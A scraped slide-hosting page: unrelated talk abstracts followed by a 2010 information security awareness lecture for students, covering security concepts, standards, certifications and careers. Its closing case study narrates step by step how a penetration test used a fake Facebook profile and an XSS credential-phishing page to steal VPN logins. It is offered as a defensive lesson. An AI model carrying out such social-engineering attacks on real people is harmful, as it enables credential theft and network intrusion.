Facebook(Meta): https://www.facebook.com/mydbops/
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
"NATO Hackathon Winner: AI-Powered Drug Search", Taras KlobaFwdays
This is a session that details how PostgreSQL's features and Azure AI Services can be effectively used to significantly enhance the search functionality in any application.
In this session, we'll share insights on how we used PostgreSQL to facilitate precise searches across multiple fields in our mobile application. The techniques include using LIKE and ILIKE operators and integrating a trigram-based search to handle potential misspellings, thereby increasing the search accuracy.
We'll also discuss how the azure_ai extension on PostgreSQL databases in Azure and Azure AI Services were utilized to create vectors from user input, a feature beneficial when users wish to find specific items based on text prompts. While our application's case study involves a drug search, the techniques and principles shared in this session can be adapted to improve search functionality in a wide range of applications. Join us to learn how PostgreSQL and Azure AI can be harnessed to enhance your application's search capability.
AppSec PNW: Android and iOS Application Security with MobSFAjin Abraham
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillLizaNolte
HERE IS YOUR WEBINAR CONTENT! 'Mastering Customer Journey Management with Dr. Graham Hill'. We hope you find the webinar recording both insightful and enjoyable.
In this webinar, we explored essential aspects of Customer Journey Management and personalization. Here’s a summary of the key insights and topics discussed:
Key Takeaways:
Understanding the Customer Journey: Dr. Hill emphasized the importance of mapping and understanding the complete customer journey to identify touchpoints and opportunities for improvement.
Personalization Strategies: We discussed how to leverage data and insights to create personalized experiences that resonate with customers.
Technology Integration: Insights were shared on how inQuba’s advanced technology can streamline customer interactions and drive operational efficiency.
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...Alex Pruden
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
20100224 Presentation at RGIT Mumbai - Information Security Awareness
1. Rajiv Gandhi Institute of Technology
February 24, 2009
Information Security … the profession;
concepts, risks and more..
Presented by:
Dinesh O Bareja
CISA, CISM, ITIL
Open Security Alliance
(www.opensecurityalliance.org)
2. About Me Warming Up
Dinesh Bareja
BA, CISA, CISM, ITIL, BS 7799 (LA, Imp)
Engaged in continuous study and learning
Work in Information Security consulting, advisory and technical
services; identifying emerging opportunities; strategic business
planning; training, mentoring and awareness & more…
Past life (pre-.com) was spent in mfg, trdg, exports.
.
Co founder of Indian Honeynet Project, Open Security Alliance and
actively involved with DSCI and other Information Security groups.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
3. A Starting Thought Warming Up
..... every human endeavour operates partly in
light and partly in shadow; and, especially, in those
fields that delve deeply into shadow, some
succumb to temptation.
- Richard Power (Computerworld)
RGIT, Mumbai 02/24 www.opensecurityalliance.org
5. Some more (simpler) thoughts Warming Up
• We have sidewalks but cannot walk on them !
• In parks they say … keep off the grass!
• Cars at home… but driving is a killer
• Using computers …. and there is the risk of
everything going wrong
• …..
• Rules… rules and more rules !!
RGIT, Mumbai 02/24 www.opensecurityalliance.org
6. My Rules Warmed Up
• Don‘t be shy … ask questions (we have a lot of time)
• Feel free to interrupt me
• Nod intelligently even if you fall asleep
• Correct me if I make a mistake (remember I am in a continuous learning
mode)
• Hijack this presentation and change it into a debate !
• Don‘t take notes, this slide deck will be available on our website (or on
the college file server)
• There is no test at the end of this session You get marks for being a
good and interactive audience
• Finally – please make sure your cellphones are in shivering mode ! It is
bad manners to make any odd sounds when people around you are
trying to learn something
RGIT, Mumbai 02/24 www.opensecurityalliance.org
7. • The What and Why of
Information Security
• Information Security Domains
and Concepts
• Standards, Guidelines and
Frameworks
Proposition
• Infosec Profession / Careers
• Risks and Awareness
RGIT, Mumbai 02/24 www.opensecurityalliance.org
8. … What …
Preserving authorized
restrictions on access and
disclosure, including
means for protecting
personal privacy and
for proprietary information
protecting information
and information
systems from
Guarding against
improper information
unauthorized access, Confidentiality modification or
Ensuring timely destruction, and
use, and reliable includes ensuring
access to and information non-
disclosure, repudiation and
use of
disruption, information. authenticity;
modification, or
destruction
Availability Integrity
RGIT, Mumbai 02/24 www.opensecurityalliance.org
9. CIA… in more detail
• Confidentiality — Sensitive information must be available only to a set of
predefined individuals. Unauthorized transmission and usage of information
should be restricted. For example, confidentiality of information ensures that a
customer's personal or financial information is not obtained by an unauthorized
individual for malicious purposes such as identity theft or credit fraud.
• Integrity — Information should not be altered in ways that render it incomplete
or incorrect. Unauthorized users should be restricted from the ability to modify
or destroy sensitive information.
• Availability — Information should be accessible to authorized users any time
that it is needed. Availability is a warranty that information can be obtained with
an agreed-upon frequency and timeliness. This is often measured in terms of
percentages and agreed to formally in Service Level Agreements (SLAs) used
by network service providers and their enterprise clients.
• Continuity — Information should be continuously available to the business
user and this is ensured thorough appropriate business continuity and disaster
preparedness.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
11. Why Information Security
• Ensure Availability of Business
• Take care of the risk of loss of Confidentiality,
Integrity and Availability of Information Assets
• Protect Data and Information Systems
• Brand and Reputation Loss
• Increased Productivity through best practices
• Higher levels of assurance
• Competitive advantage
• Enable Business Continuity and Disaster Recovery
And for this we need Security Controls
RGIT, Mumbai 02/24 www.opensecurityalliance.org
12. Security Controls
Computer security is often divided into three distinct master categories, commonly referred to as controls:
– Physical
– Technical
– Administrative
Physical Controls - is the implementation of security measures in a defined structure used to deter or prevent unauthorized access to
sensitive material. Examples of physical controls are:
• Closed-circuit surveillance cameras
• Motion or thermal alarm systems
• Security guards
• Picture IDs
• Locked and dead-bolted steel doors
• Biometrics (includes fingerprint, voice, face, iris, handwriting, and other automated methods used to recognize individuals)
Administrative Controls - define the human factors of security. It involves all levels of personnel within an organization and determines
which users have access to what resources and information by such means as:
• Training and awareness
• Disaster preparedness and recovery plans
• Personnel recruitment and separation strategies
• Personnel registration and accounting
Technical Controls - use technology as a basis for controlling the access and usage of sensitive data throughout a physical structure
and over a network. Technical controls are far-reaching in scope and encompass such technologies as:
• Encryption
• Smart cards
• Network authentication
• Access control lists (ACLs)
• File integrity auditing software
RGIT, Mumbai 02/24 www.opensecurityalliance.org
13. Key Information Security Program Elements
Technology Process
People
RGIT, Mumbai 02/24 www.opensecurityalliance.org
14. Key Information Security Program Elements
- Training
Technology - Awareness Process
- HR Policies
- Background Checks
- Roles /
responsibilities
- Mobile Computing
- Social Engineering
- Social Networking
- Acceptable Use
- Policies
- Performance Mgt
- System Security - Risk Management
- UTM. Firewalls - Asset Management
- IDS/IPS - Data Classification
- Data Center - Info Rights Mgt
- Physical Security - Data Leak Prevention
- Vulnerability Assmt - Access Management
- Penetration Testing - Change Management
-Application Security - Patch Management
- Secure SDLC - Configuration Mgmt
- SIM/SIEM - Incident Response
- Managed Services - Incident Management
People
RGIT, Mumbai 02/24 www.opensecurityalliance.org
15. Essential Information Security Practices
• MANAGEMENT COMMITMENT
• RISK MANAGEMENT
• ASSET INVENTORY AND MANAGEMENT
• CHANGE MANAGEMENT
• INCIDENT RESPONSE AND MANAGEMENT
• CONFIGURATION MANAGEMENT
• TRAINING AND AWARENESS
• CONTINUOUS AUDIT
• METRICS AND MEASUREMENT
RGIT, Mumbai 02/24 www.opensecurityalliance.org
18. Risk Management
• Risk is defined in ISO 31000 as the effect of uncertainty on objectives
(whether positive or negative).
• Risk management : the identification, assessment, and prioritization of
risks followed by coordinated and economical application of resources
to minimize, monitor, and control the probability and/or impact of
unfortunate events or to maximize the realization of opportunities.
• Risks can come from uncertainty in financial markets, project failures,
legal liabilities, credit risk, accidents, natural causes and disasters as
well as deliberate attacks from an adversary.
• Strategies to manage risk :
– Avoidance (eliminate, withdraw from or not become involved)
– Reduction (optimise - mitigate)
– Sharing (transfer - outsource or insure)
– Retention (accept and budget)
RGIT, Mumbai 02/24 www.opensecurityalliance.org
20. The driver … Malicious Motivation
Criminal
Intent
Coercion
Greed
Show Off
Revenge
Attack
Curiosity
RGIT, Mumbai 02/24 www.opensecurityalliance.org
21. Hackers ‗n‘ Crackers
• During the 1960s, the word "hacker" grew to prominence describing a
person with strong computer skills, an extensive understanding of how
computer programs worked, and a driving curiosity about computer
systems.
• True hackers are computer programming enthusiasts who pushed
computer systems to their limits without malicious intent and followed a
hacker code of ethics.
• They believed technical information should be freely available to any
person, and they abided by a code of ethics that looked down upon
destroying, moving, or altering information in a way could cause injury
or expense.
• Hacking, however, soon became nearly synonymous with illegal
activity. Negative publicity surrounding hackers continued to grow.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
22. Hackers ‗n‘ Crackers
• While the first incidents of hacking dealt with breaking into phone
systems, hackers also began diving into computer systems as
technology advanced.
• Hacking became increasingly problematic during the 1980s and as a
result, in the US the Computer Fraud and Abuse Act was created,
imposing more severe punishments for those caught abusing computer
systems. In the early 1980s, the FBI made one of its first arrests
related to hacking.
• As a result, several hacker groups coined the term 'cracker' in 1985 to
define a person who broke into computer systems and ignored hacker
ethics; however, the media continued to use the word hacker.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
23. Profiling …. the color of your hat !
Black Hat
Also known as crackers these are the
White Hat ones to watch out for, they send and
Also known as friendly hackers are always make viruses, destroy data, and
using their knowledge for good reasons deface websites along with other
illegal activity and break into peoples
machines. This type of hacker has a
bad reputation.
Grey Hat …
Are borderline white/black hats. They Not to forget the
sometimes prank unsuspecting users and hatless…..
cause general mayhem. While they think
this kind of activity is harmless, they may - Script Kiddies
face long periods of jail time if they ever get - The Hobbyist
found out.
- Insider
- Countries
RGIT, Mumbai 02/24 www.opensecurityalliance.org
24. • Information Security is
implemented in organizations
based on Standards, Guidelines,
Frameworks,
• Other factors are Laws and
Regulations, Customer
requirements Standards etc
• All require the adoption of best
practices
RGIT, Mumbai 02/24 www.opensecurityalliance.org
25. Common Standards / Frameworks / Guidelines / Regulatory
• ISO:27001 – 2005 IT Act and applicable Criminal /
• PCI-DSS Civil legislation
• CobiT HIPAA
• BS:25999 GLBA
• ISO 2000 Sarbanes Oxley
• ITIL Basel II
• Clause 49 (SEBI Guideline, PCAOB
Government of India) SAS 70
• CTCL Privacy Laws (e.g.PIPEDA)
• NERC-CIP … many more…..
• Data Protection Act
RGIT, Mumbai 02/24 www.opensecurityalliance.org
26. • ISO 27001, BS 25999, CobiT, IIL
or ISO 20000
• These are the most widely used
and recognized standard for
Information Security globally
ISO 27001, CobiT etc
• Form the foundation of security
for various other framework and
regulatory requirements
RGIT, Mumbai 02/24 www.opensecurityalliance.org
27. ISO 27001: 2005
• ―Information security is the protection of
information from a wide range of threats in order to
ensure business continuity, minimize business risk,
and maximize return on investments and business
opportunities.‖
RGIT, Mumbai 02/24 www.opensecurityalliance.org
28. ISO 27001 Fundamental Principles
Maintain and Establish ISMS
Improve the Context and Risk
ISMS Assessment
Act Plan
Development,
Improvement
and
Maintenance
Cycle
Check Do
Monitor and Design and
Review the Implement the
ISMS ISMS
RGIT, Mumbai 02/24 www.opensecurityalliance.org
29. ISO 27001 Fundamental Principle
Act Plan
Check Do
RGIT, Mumbai 02/24 www.opensecurityalliance.org
30. ITIL ®
• The Information Technology Infrastructure Library (ITIL) is a set of
concepts and practices for managing Information Technology (IT)
services (ITSM), IT development and IT operations.
• ITIL gives detailed descriptions of a number of important IT practices
and provides comprehensive checklists, tasks and procedures that any
IT organization can tailor to its needs. ITIL is published in a series of
books, each of which covers an IT management topic.
• Service Strategy
• Service Design
• Service Transition
• Service Operation
• Continual Service Improvement
RGIT, Mumbai 02/24 www.opensecurityalliance.org
33. BS 25999
• The standard for Business Continuity Management.
• Part 1 : Code of Practice
– Section 1 - Scope and Applicability.
– Section 2 - Terms and Definitions.
– Section 3 - Overview of Business Continuity Management.
– Section 4 - The Business Continuity Management Policy.
– Section 5 - BCM Programme Management.
– Section 6 - Understanding the organization.
– Section 7 - Determining BCM Strategies.
– Section 8 - Developing and implementing a BCM response.
– Section 9 - Exercising, maintenance, audit and self-assessment of the BCM culture.
– Section 10 - Embedding BCM into the organizations culture.
• Part 2 : Specification
– Section 1 - Scope.
– Section 2 - Terms and Definitions.
– Section 3 - Planning the Business Continuity Management System (PLAN).
– Section 4 - Implementing and Operating the BCMS (DO)
– Section 5 - Monitoring and Reviewing the BCMS (CHECK)
– Section 6 Maintaining and Improving the BCMS (ACT)
RGIT, Mumbai 02/24 www.opensecurityalliance.org
34. Essential Information Security Practices
• MANAGEMENT COMMITMENT
• RISK MANAGEMENT
• ASSET INVENTORY AND MANAGEMENT
• CHANGE MANAGEMENT
• INCIDENT RESPONSE AND MANAGEMENT
• CONFIGURATION MANAGEMENT
• TRAINING AND AWARENESS
• CONTINUOUS AUDIT
• METRICS AND MEASUREMENT
RGIT, Mumbai 02/24 www.opensecurityalliance.org
35. • General information about data
loss and breaches
• Snapshot of CERT reported Data Loss Statistics
incidences:
– 2003 - 137,529
– 2002 - 82,094
– 2001 - 52,658
RGIT, Mumbai 02/24 www.opensecurityalliance.org
36. Internet Users
Internet User Growth
RGIT, Mumbai 02/24 www.opensecurityalliance.org
39. Size / Business Does Not Matter
Data Breach by industry type
Number of Employees by Percent of Breaches 13 percent of
organizations
had recently
been merged
or acquired
Source: Verizon Data Breach Incident Report 2009
RGIT, Mumbai 02/24 www.opensecurityalliance.org
41. • Statistics for online habits
• Some common risks
• What can you do for yourself,
the college and the community Profession and Career
RGIT, Mumbai 02/24 www.opensecurityalliance.org
42. Information Security Certifications
ISACA - Information Systems Audit and Control Association
• CISA - Certified Information Systems Auditor
• CISM - Certified Information Security Manager
• CGEIT - Certified in the Governance of Enterprise IT
• CRISC - Certified in Risk and Information Systems Control
(ISC)²
• CISSP - Certified Information Systems Security Professional
• SSCP® - Systems Security Certified Practitioner
Institute of Internal Auditors
• CIA - Certified Internal Auditor
• (CGAP®) - The Certified Government Auditing Professional
• CFSA® - Certified Financial Services Auditor
• CCSA® Certification in Control Self-Assessment
PMI
• PMP
The Security Industry Association (SIA)
• CSPM - Certified Security Project Manager (CSPM)
RGIT, Mumbai 02/24 www.opensecurityalliance.org
43. Information Security Certifications
[ITIL]
• ITIL Service Management Foundations Certificate
• ITIL Service Manager
• ITIL Practitioner
DRI - Institute for Continuity Management
• ABCP - Associate Business Continuity Professional
• CBCP - Certified Business Continuity Professional
• CFCP - Certified Functional Continuity
• MBCP - Master Business Continuity
Association of Certified Fraud Examiners (ACFE)
• CFE - Certified Fraud Examiner
Forensics - EnCase®
• EnCE® - EnCase® Certified Examiner (EnCE®)
CISCO
• CCSP – Cisco Certified Security Professional
RGIT, Mumbai 02/24 www.opensecurityalliance.org
44. Career Specializations
• 1. Computer forensics – Learn forensic investigation tools and techniques to investigate cyber crimes and financial
crimes.
2. IT security auditor – Focus on auditing capabilities. As part of this, you must explore platforms like mainframes,
SAP, and core banking platforms as your areas of expertise.
3. Application security specialist – Specialize in areas like secure coding, security testing tools and techniques,
secure design of web applications, and threat modelling.
4. Compliance specialist – Focus on helping organizations comply to standards and regulations such as ISO 27001,
PCI DSS, HIPAA, FDA and Sarbanes-Oxley.
5. Security solutions architect – Specialize in secure network architecture, security solutions procurement and
deployment, and hardening of infrastructure.
6. Security trainer – Focus on spreading knowledge about information security, and create awareness at all levels.
7. Cyber law expert – Combine knowledge of the Indian IT Act 2008 with IT knowledge and forensics know-how.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
45. Some Required Skills or Traits
• 1. High level of passion - Security changes on an almost daily basis – there are new tools, attack
vectors, and vulnerabilities being discovered almost hourly. A security professional can remain ahead
of the game only by constantly updating himself, and this requires a high amount of passion for the
field. A security professional should not only be well-versed with a wide range of technologies,
but also be reasonably acquainted with the basics of psychology, economics, finance, and
physical security.
2. Creativity - Be it a penetration test or developing an automated way to carry out a particular activity,
a high level of creativity is a must in every aspect of a security professional's job. Thinking out of the
box is an almost daily activity for a security professional.
3. A never-say-die attitude - Security issues are typically complex, and often there are no easy
solutions. Quite often, the situations are also very high-pressure – the client's been hacked, or
someone inside leaked out critical internal data, or systems have to be hardened before going live. A
seasoned security professional knows that there is a solution on the other side of every problem. And
he is willing to do what it takes to be as resourceful in finding the right solution.
4. Grasp of a wide range of subjects - Security is not just about policies and procedures or buffer
overflows or SQL injection. Most security issues stem from, and can be resolved, by human
intervention. A security professional should not only be well-versed with a wide range of technologies,
but should also be reasonably acquainted with the basics of psychology, economics, finance, and
physical security.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
46. Technology Skills
• Application Development
• Secure SDLC
• Networking
• Vulnerability Assessment
• Penetration Testing On any given day, there
are approximately 225
• System Hardening major incidences of
security breach
• Device Support reported to the CERT
Coordination Center at
• Wireless Security Carnegie Mellon
University.
• …
RGIT, Mumbai 02/24 www.opensecurityalliance.org
47. • Common and uncommon Risks
• Statistics about online habits
• What can you do for yourself,
the college and the community Risks and Awareness
RGIT, Mumbai 02/24 www.opensecurityalliance.org
48. What Can You Do
• Cyber Security (virus, online habits, filesharing
etc)– Cyberethics (copying and use of IP) –
Cybersafety (identify protection, cyber bullying etc)
• Educate your friends and family (trojans,
keyloggers, phishing, scams
• Secure home computers and for family/friends
(wireless, backup etc)
• Take care of your Social Networking risks
RGIT, Mumbai 02/24 www.opensecurityalliance.org
49. Securing Yourself
• Common Sense
• Awareness
• Regularly Update Patches
• Anti Virus, anti spyware…
• Be careful on P2P filesharing .. what you download
• Read the computer message(s)
• Don‘t blindly click next > next > next
• Be careful when you read email especially if it belongs to
someone else
• Don‘t try to open every attachment
• Keep your password to yourself
• CybeSecurity – Cyberethics – Cybersafety
RGIT, Mumbai 02/24 www.opensecurityalliance.org
52. How many friends are online and in real life
RGIT, Mumbai 02/24 www.opensecurityalliance.org
53. So what have you done online lately
• I have connected with old friends online
• Rekindled a relationship online
• Share a secret or two or some personal stuff
online
RGIT, Mumbai 02/24 www.opensecurityalliance.org
57. What Can You Do
• Cyber Security (virus, online habits, filesharing
etc)– Cyberethics (copying and use of IP) –
Cybersafety (identify protection, cyber bullying etc)
• Educate your friends and family (trojans,
keyloggers, phishing, scams
• Secure home computers and for family/friends
(wireless, backup etc)
• Take care of your Social Networking risks
RGIT, Mumbai 02/24 www.opensecurityalliance.org
58. What Can You Do (2)
• Think out of the box
• Evaluate tools and technologies as part of your projects
• Develop tools and scripts
• Share findings with industry, government and law
enforcement
• Research and study malware trends, defense methods
• Create a virtual library of your work so your peers and
followers will also benefit
• Institutional security policies and procedures
• Conduct network assessments in the college from time to
time and share the findings with all
RGIT, Mumbai 02/24 www.opensecurityalliance.org
59. Future trends / opportunities
• Social networking compliance assurance
• Unified communication
• Microblogging
• Intelligent search
• Mobile apps
RGIT, Mumbai 02/24 www.opensecurityalliance.org
60. Case Study
• Factual Facebook Hack Case Study
– http://snosoft.blogspot.com/2009/02/facebook-from-
hackers-perspective.html
• Twitter Hack
• Hotmail Outage leads to malware offering sites
• Clicking Blindly
RGIT, Mumbai 02/24 www.opensecurityalliance.org
61. • Some information about Open
Security Alliance
About Us
RGIT, Mumbai 02/24 www.opensecurityalliance.org
62. Open Security Alliance
A small group of professionals working in Information Security got
together to discuss life beyond technical stuff which non-techies find
difficult to understand.
So these guys got together to work under the OSA banner to present
risks, threats and vulnerabilities in an easy and understandable
language. Just to make sure the non-geek understands the problems
as well and gets as scared as the IS guy.
• OSA - an open community of individuals who are committed to
providing the benefit of their knowledge and expertise to community.
• OSA - individual initiatives to undertake research and studies in
Information Security (India centric) then provide learning to community.
• …. The underlying thought is to Be The Change.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
63. Contact Information
• Dinesh O Bareja
– M: +91.9769890505
– E: dineshbareja@gmail.com
– E: dinesh@opensecurityalliance.org
– Twitter: @bizsprite
– Linked In (India Information Security Community)
RGIT, Mumbai 02/24 www.opensecurityalliance.org
65. Disclaimer
• All logos and brand names belong to their respective owners and we do not claim any relationship or
association, implied or otherwise, with them.
• Use of any materials by virtue of relationships and associations, if any, are mentioned explicitly.
• We have taken care to attribute all sources for external materials used in this presentation, and any
oversight is regretted. If you, as owner, or as viewer, find any reason to dispute the use of these
materials kindly communicate the same to us at “issues AT opensecurityalliance DOT org
• Any omissions, in terms of attribution, may be due to an error on our part and not intentional.
This document is a creation of securians.com and is released in the public domain under
Creative Commons License (Attribution-Noncommercial 2.5 India)
http://creativecommons.org/licenses/by-nc-sa/2.5/in/.
Disclaimer: The practices listed in the document are provided as is and as guidance and the authors do
not claim that these comprise the only practices to be followed. The readers are urged to make
informed decisions in their usage. Feedback is solicited and you can access other topics at our
website www.securians.com
Contributors: Dinesh O Bareja Reviewers: Vicky Shah
Title: Information Security … the profession; concepts, risks and more..
Version: 1.0 / February 2010
RGIT, Mumbai 02/24 www.opensecurityalliance.org
66. References
• Educause Video Contest
http://www.educause.edu/SecurityVideoContest
• CERT
• India CERT
• NIST
• OWASP
• SANS
RGIT, Mumbai 02/24 www.opensecurityalliance.org
67. Social Networking Case Study : Facebook Hack
• The threat from social networks comes from social
engineering — employees post company information…
the attackers collects during reconnaissance … then
infiltrates the social network that exists between the
employees … then uses that trust to phish for VPN
passwords or any other information….
The Facebook hack case study is for an assignment carried out
by SnoSoft and presents a unique insight into the threats and
Case Study
risks exposed on such sites
RGIT, Mumbai 02/24 www.opensecurityalliance.org
68. Facebook Hack Step 1 : Reconnaissance
• Conduct Social and Technical Reconnaissance
• Social
– 1400 employees identified through the internet of which 900 used social networking
sites like Facebook, Orkut, LinkedIn, MySpace etc.
– Studied about 200 profiles and created a false identity
• Technical
– Probed the corporate website and identified Cross Side Scripting vulnerabilities
(which the researchers expected and hoped to find)
Cross-site scripting ("XSS") vulnerability is
most frequently discovered in websites that do
not have sufficient input validation or data
Case Study
validation capabilities. XSS vulnerabilities
allow an attacker to inject code into a website
that is viewed by other users. This injection
can be done sever side by saving the injected
code on the server (in a forum, blog, etc) or it
can be done client side by injecting the code
into a specially crafted URL that can be
delivered to a victim.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
69. Facebook Hack Step 2: Setup
• Used a client side attack as opposed to a server side attack because it enabled
the select ion of only those users that we are interested in attacking. Server
side attacks are not as surgical and usually affect any user who views the
compromised server page.
• A payload is created and was designed to render a legitimate looking https
secured web page that appeared to be a component of the customer's web site.
• When a victim clicks on the specially crafted link the payload is executed and
the fake web page is rendered.
• In this case our fake web page was an alert that warned users that their
accounts may have been compromised and that they should verify their
credentials by entering them into the form provided.
• When the users credentials are entered the form submitted them to
Case Study
http://www.netragard.com and were extracted by an automated tool that had
been created.
•
RGIT, Mumbai 02/24 www.opensecurityalliance.org
70. Facebook Hack Step 3: Create Profile
• After the payload was created and tested we started the process of
building an easy to trust facebook profile.
• Because most of the targeted employees were male between the
ages of 20 and 40 we decided that it would be best to become a
very attractive 28 year old female.
• A fitting photograph was found by searching google images and used
for the fake Facebook profile.
• The profile was populated with information about our experiences at
work by using combined stories that were collected from real employee
facebook profiles.
Case Study
RGIT, Mumbai 02/24 www.opensecurityalliance.org
71. Facebook Hack Step 3: Create Profile
• After the payload was created and tested we started the process of
building an easy to trust facebook profile.
• Because most of the targeted employees were male between the
ages of 20 and 40 we decided that it would be best to become a
very attractive 28 year old female.
• A fitting photograph was found by searching google images and used
for the fake Facebook profile.
• The profile was populated with information about our experiences at
work by using combined stories that were collected from real employee
facebook profiles.
Case Study
RGIT, Mumbai 02/24 www.opensecurityalliance.org
72. Facebook Hack Step 4: Attack Launch
• Upon completion we joined the company facebook group.
• Joining request was approved in a matter of hours and within twenty
minutes of accepted as group members, legitimate customer
employees began sending friendship requests.
• In addition we made hundreds of outbound requests.
• The friends list grew very quickly and included managers, executives,
secretaries, interns, and even contractors.
• Having collected a few hundred friends, we began chatting.
Case Study
RGIT, Mumbai 02/24 www.opensecurityalliance.org
73. Facebook Hack Step 5: Attack On
• Conversations were based on work related issues that we were able
to collect from legitimate employee profiles.
• After a period of three days of conversing and sharing links, we
posted our specially crafted link to our facebook profile.
The title of the link was "Omigawd have you seen this I think we got
hacked!”
…. and people started clicking on the link and verifying their credentials.
• Ironically, the first set of credentials that we got belonged to the
hiring manager.
Case Study
RGIT, Mumbai 02/24 www.opensecurityalliance.org
74. Facebook Hack Step 6: Success
• Using those credentials one had access to the web-vpn which in
turn gave access to the network.
• Those credentials also allowed access to a majority of systems on
the network including the Active Directory server, the mainframe,
pump control systems, the checkpoint firewall console, etc.
The Facebook hack has worked.
Case Study
RGIT, Mumbai 02/24 www.opensecurityalliance.org
75. Hotmail Outage
• Tuesday, February 16, 2010
• Hotmail Users Look for Answers in Dangerous Places
• An outage of the Windows Live ID service affected a large number of
MSN users today including users of the popular Hotmail email service.
Hotmail is one of the largest web based email outlets and not
surprisingly news of the outage spread quickly as users were not able
to access their email.
Those hoping to find more information on Google may have ended up
with more than they bargained for. Blackhats have once again worked
their magic to infect users looking for news related to the outage. In
fact, 8 out of the top 10 results for ―hotmail service unavailable‖
returned dangerous URLs.
RGIT, Mumbai 02/24 www.opensecurityalliance.org
78. Le Twitter hack
RGIT, Mumbai 02/24 www.opensecurityalliance.org
79. Le Twitter Hack
From lalawaq.com
RGIT, Mumbai 02/24 www.opensecurityalliance.org
80. Clicking Blindly
Case Study : Clicking blindly !
Settled in for a nice bit of surfing in the library!
Study ! Ah hah ! Just don‘t click the link blindly !
Whoops ! That‘s a big load of malware you just got
From EDUCAUSE with sound effects !
RGIT, Mumbai 02/24 www.opensecurityalliance.org
81. You don‘t want to look like this !
Case Study : Clicking blindly !
RGIT, Mumbai 02/24 www.opensecurityalliance.org
82. Case Study : Clicking blindly !
RGIT, Mumbai 02/24 www.opensecurityalliance.org